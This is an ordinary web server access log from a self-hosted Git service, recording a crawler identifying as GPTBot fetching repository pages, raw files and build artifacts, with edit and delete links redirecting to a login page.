+[17/Feb/2026:17:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" +[17/Feb/2026:17:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12007] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" +[17/Feb/2026:17:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" +[17/Feb/2026:17:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10170] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:17:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11575] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:09:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:17:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:17:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12206] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" +[17/Feb/2026:17:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:17:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:17:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:17:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:09:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 11107] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10035] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" +[17/Feb/2026:17:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11283] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 1485] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:10:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:10:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10081] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:17:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:17:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:17:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:17:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 15363] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:17:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11917] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11916] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:10:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:17:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:17:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22050] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13506] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11547] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11533] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:17:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" 